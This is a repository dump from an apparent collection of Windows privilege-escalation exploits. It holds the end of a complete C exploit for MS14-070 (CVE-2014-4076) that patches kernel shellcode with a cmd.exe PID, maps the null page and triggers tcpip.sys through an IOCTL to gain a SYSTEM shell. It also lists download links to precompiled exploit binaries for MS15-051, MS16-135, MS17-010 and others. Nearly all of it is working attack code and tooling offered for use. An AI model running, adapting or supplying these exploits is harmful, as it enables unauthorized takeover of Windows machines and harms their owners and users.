| } 143 | 144 | 145 | 146 | 147 | unsigned long SwapBytes (unsigned long inputByteUL) 148 | { 149 | return (((inputByteUL&0x000000FF) << 24) + ((inputByteUL&0x0000FF00) << 8) + 150 | ((inputByteUL&0x00FF0000) >> 8) + ((inputByteUL&0xFF000000) >> 24)); 151 | } 152 | 153 | 154 | 155 | 156 | BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode) 157 | { 158 | int returnAllocMemValue1, returnAllocMemValue2, returnAllocMemValue3, returnAllocMemValue4, returnAllocMemValue5; 159 | 160 | returnAllocMemValue1 = WriteProcessMemory ( 161 | (HANDLE) 0xFFFFFFFF, 162 | (LPVOID) 0x28, 163 | "\x87\xff\xff\x38", 164 | 4, 165 | NULL 166 | ); 167 | returnAllocMemValue2 = WriteProcessMemory ( 168 | (HANDLE) 0xFFFFFFFF, 169 | (LPVOID) 0x38, 170 | "\x00\x00", 171 | 2, 172 | NULL 173 | ); 174 | returnAllocMemValue3 = WriteProcessMemory ( 175 | (HANDLE) 0xFFFFFFFF, 176 | (LPVOID) 0x1100, 177 | &exploitBuffer[0], 178 | 32, 179 | NULL 180 | ); 181 | returnAllocMemValue4 = WriteProcessMemory ( 182 | (HANDLE) 0xFFFFFFFF, 183 | (LPVOID) 0x2b, 184 | "\x00\x00", 185 | 2, 186 | NULL 187 | ); 188 | returnAllocMemValue5 = WriteProcessMemory ( 189 | (HANDLE) 0xFFFFFFFF, 190 | (LPVOID) 0x2000, 191 | &shellcode[0], 192 | 96, 193 | NULL 194 | ); 195 | 196 | if (returnAllocMemValue1 == 0 || 197 | returnAllocMemValue2 == 0 || 198 | returnAllocMemValue3 == 0 || 199 | returnAllocMemValue4 == 0 || 200 | returnAllocMemValue5 == 0) 201 | return FALSE; 202 | else 203 | return TRUE; 204 | } 205 | 206 | 207 | 208 | 209 | int main (void) 210 | { 211 | fprintf (stderr, "[*] MS14-070 (CVE-2014-4076) x86\n"); 212 | fprintf (stderr, " [*] by Tomislav Paskalev\n"); 213 | fflush (stderr); 214 | 215 | 216 | //////////////////////////////// 217 | // CREATE NEW CME.EXE PROCESS 218 | //////////////////////////////// 219 | 220 | STARTUPINFO *startupInformation = (STARTUPINFO *) malloc (sizeof (STARTUPINFO)); 221 | PROCESS_INFORMATION *processInformation = (PROCESS_INFORMATION *) malloc (sizeof (PROCESS_INFORMATION)); 222 | 223 | if (!CreateNewCmdProcess (&startupInformation[0], &processInformation[0])) 224 | { 225 | fprintf (stderr, "[-] Creating a new process failed\n"); 226 | fprintf (stderr, " [*] Error code : %d\n", GetLastError()); 227 | fflush (stderr); 228 | ExitProcess (1); 229 | } 230 | 231 | fprintf (stderr, "[+] Created a new cmd.exe process\n"); 232 | fflush (stderr); 233 | 234 | 235 | //////////////////////////////// 236 | // CONVERT PID TO HEX LE 237 | //////////////////////////////// 238 | 239 | unsigned long pidLittleEndian = SwapBytes ((unsigned long) processInformation->dwProcessId); 240 | fprintf (stderr, " [*] PID [dec] : %#8lu\n", (unsigned long) processInformation->dwProcessId); 241 | fprintf (stderr, " [*] PID [hex] : %#010x\n", (unsigned long) processInformation->dwProcessId); 242 | fprintf (stderr, " [*] PID [hex LE] : %#010x\n", pidLittleEndian); 243 | 244 | /*four bytes of hex = 8 characters, plus NULL terminator*/ 245 | unsigned char pidLittleEndianString[9]; 246 | 247 | sprintf (&pidLittleEndianString[0], "%04x", pidLittleEndian); 248 | 249 | 250 | //////////////////////////////// 251 | // CREATE SHELLCODE 252 | //////////////////////////////// 253 | 254 | unsigned char exploitBuffer[] = 255 | "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00" 256 | "\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"; 257 | unsigned char shellcode[] = 258 | "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00" 259 | "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00" 260 | "\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41" 261 | "\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94" 262 | "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11" 263 | "\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00"; 264 | 265 | int counter; 266 | for (counter = 0; counter < 4; counter++) 267 | { 268 | char buffer[3] = {pidLittleEndianString[counter * 2], pidLittleEndianString[(counter * 2) + 1], 0}; 269 | shellcode[46 + counter] = strtol (buffer, NULL, 16); 270 | } 271 | 272 | shellcode[77] = strtol ("39", NULL, 16); 273 | shellcode[78] = strtol ("ff", NULL, 16); 274 | shellcode[79] = strtol ("a2", NULL, 16); 275 | shellcode[80] = strtol ("ba", NULL, 16); 276 | 277 | shellcode[82] = strtol ("0", NULL, 16); 278 | shellcode[83] = strtol ("0", NULL, 16); 279 | shellcode[84] = strtol ("0", NULL, 16); 280 | shellcode[85] = strtol ("0", NULL, 16); 281 | 282 | fprintf (stderr, "[+] Modified shellcode\n"); 283 | fflush (stderr); 284 | 285 | 286 | //////////////////////////////// 287 | // CREATE HANDLE ON TCPIP.SYS 288 | //////////////////////////////// 289 | 290 | HANDLE tcpIPDeviceHandle = CreateFileA ( 291 | "\\\\.\\Tcp", 292 | 0, 293 | 0, 294 | NULL, 295 | OPEN_EXISTING, 296 | 0, 297 | NULL 298 | ); 299 | 300 | if (tcpIPDeviceHandle == INVALID_HANDLE_VALUE) 301 | { 302 | printf ("[-] Opening TCP/IP I/O dev failed\n"); 303 | printf (" [*] Error code : %d\n", GetLastError()); 304 | ExitProcess (1); 305 | } 306 | 307 | fprintf (stderr, "[+] Opened TCP/IP I/O device\n"); 308 | fflush (stderr); 309 | 310 | 311 | //////////////////////////////// 312 | // ALLOCATE MEMORY - FIRST PAGE 313 | //////////////////////////////// 314 | 315 | FARPROC ZwAllocateVirtualMemory; 316 | 317 | ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwAllocateVirtualMemory"); 318 | 319 | fprintf (stderr, "[*] ntdll.dll address: 0x%p\n", ZwAllocateVirtualMemory); 320 | fflush (stderr); 321 | 322 | NTSTATUS AllocMemReturnCode; 323 | ULONG BaseAddress = 0x1000, RegionSize = 0x4000; 324 | 325 | AllocMemReturnCode = ZwAllocateVirtualMemory ( 326 | (HANDLE) 0xFFFFFFFF, 327 | &BaseAddress, 328 | 0, 329 | &RegionSize, 330 | MEM_COMMIT | MEM_RESERVE, 331 | PAGE_EXECUTE_READWRITE 332 | ); 333 | 334 | if (AllocMemReturnCode != 0) 335 | { 336 | printf ("[-] Allocating memory failed\n"); 337 | printf (" [*] Error code : %#X\n", AllocMemReturnCode); 338 | ExitProcess (1); 339 | } 340 | 341 | fprintf (stderr, "[+] Allocated memory\n"); 342 | fprintf (stderr, " [*] BaseAddress : 0x%p\n", BaseAddress); 343 | fprintf (stderr, " [*] RegionSize : %#010x\n", RegionSize); 344 | fflush (stderr); 345 | 346 | 347 | //////////////////////////////// 348 | // WRITE EXPLOIT TO PROCESS MEM 349 | //////////////////////////////// 350 | 351 | fprintf (stderr, "[*] Writing exploit...\n"); 352 | fflush (stderr); 353 | 354 | if (!WriteToAllocMem (&exploitBuffer[0], &shellcode[0])) 355 | { 356 | fprintf (stderr, " [-] Failed to write to memory\n"); 357 | fprintf (stderr, " [*] Err code : %d\n", GetLastError ()); 358 | fflush (stderr); 359 | ExitProcess (1); 360 | } 361 | else 362 | { 363 | fprintf (stderr, " [+] done\n"); 364 | fflush (stderr); 365 | } 366 | 367 | 368 | //////////////////////////////// 369 | // SEND EXPLOIT TO TCPIP.SYS 370 | //////////////////////////////// 371 | 372 | fprintf (stderr, "[*] Spawning SYSTEM shell...\n"); 373 | fprintf (stderr, " [*] Parent proc hangs on exit\n"); 374 | fflush (stderr); 375 | 376 | FARPROC ZwDeviceIoControlFile; 377 | NTSTATUS DevIoCtrlReturnCode; 378 | ULONG ioStatus = 8; 379 | 380 | ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwDeviceIoControlFile"); 381 | 382 | DevIoCtrlReturnCode = ZwDeviceIoControlFile ( 383 | tcpIPDeviceHandle, 384 | NULL, 385 | NULL, 386 | NULL, 387 | (PIO_STATUS_BLOCK) &ioStatus, 388 | 0x00120028, //Device: NETWORK (0x12) 389 | //Function: 0xa 390 | //Access: FILE_ANY_ACCESS 391 | //Method: METHOD_BUFFERED 392 | (PVOID) 0x1100, //NULL, //Test 393 | 32, //0, //Test 394 | NULL, 395 | 0 396 | ); 397 | 398 | if (DevIoCtrlReturnCode != 0) 399 | { 400 | fprintf (stderr, " [-] Exploit failed (->TCP/IP)\n"); 401 | fprintf (stderr, " [*] Err code : %d\n", GetLastError ()); 402 | fflush (stderr); 403 | ExitProcess (1); 404 | } 405 | 406 | 407 | //////////////////////////////// 408 | // WAIT FOR CHILD PROCESS; EXIT 409 | //////////////////////////////// 410 | 411 | // Wait until child process exits. 412 | WaitForSingleObject (processInformation->hProcess, INFINITE); 413 | 414 | fprintf (stderr, "[*] Exiting SYSTEM shell...\n"); 415 | fflush (stderr); 416 | 417 | // Close process and thread handles. 418 | CloseHandle (tcpIPDeviceHandle); 419 | CloseHandle (processInformation->hProcess); 420 | CloseHandle (processInformation->hThread); 421 | 422 | return 1; 423 | } 424 | -------------------------------------------------------------------------------- /MS14-070/37755.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS14-070/37755.exe -------------------------------------------------------------------------------- /MS15-001/35661-poc.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-001/35661-poc.zip -------------------------------------------------------------------------------- /MS15-001/AppCompatCache.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-001/AppCompatCache.exe -------------------------------------------------------------------------------- /MS15-001/TestDLL.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-001/TestDLL.dll -------------------------------------------------------------------------------- /MS15-010/39035.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-010/39035.exe -------------------------------------------------------------------------------- /MS15-010/39035.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-010/39035.zip -------------------------------------------------------------------------------- /MS15-051/37049-src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-051/37049-src.zip -------------------------------------------------------------------------------- /MS15-051/MS15-051_Taihou32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-051/MS15-051_Taihou32.exe -------------------------------------------------------------------------------- /MS15-051/MS15-051_Taihou64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-051/MS15-051_Taihou64.exe -------------------------------------------------------------------------------- /MS15-076/37768.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-076/37768.zip -------------------------------------------------------------------------------- /MS15-076/37768/Microsoft.VisualStudio.OLE.Interop.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-076/37768/Microsoft.VisualStudio.OLE.Interop.dll -------------------------------------------------------------------------------- /MS15-076/37768/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-076/37768/Trebuchet.exe -------------------------------------------------------------------------------- /MS15-097/38198.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-097/38198.zip -------------------------------------------------------------------------------- /MS15-097/38198/Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-097/38198/Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe -------------------------------------------------------------------------------- /MS15-097/38198/injected.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS15-097/38198/injected.dll -------------------------------------------------------------------------------- /MS16-016/39788.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS16-016/39788.zip -------------------------------------------------------------------------------- /MS16-016/39788/EoP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS16-016/39788/EoP.exe -------------------------------------------------------------------------------- /MS16-016/39788/Shellcode.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS16-016/39788/Shellcode.dll -------------------------------------------------------------------------------- /MS16-135/40823.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS16-135/40823.zip -------------------------------------------------------------------------------- /MS16-135/40823/SetWindowLongPtr_Exploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS16-135/40823/SetWindowLongPtr_Exploit.exe -------------------------------------------------------------------------------- /MS16-135/40823/SetWindowLongPtr_Exploit.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS16-135/40823/SetWindowLongPtr_Exploit.pdb -------------------------------------------------------------------------------- /MS16-135/41015.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS16-135/41015.exe -------------------------------------------------------------------------------- /MS17-010/MS17-010.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS17-010/MS17-010.exe -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WindowsExploits 2 | Mostly precompiled Windows exploits, largely forked from https://github.com/AusJock/Privilege-Escalation 3 | --------------------------------------------------------------------------------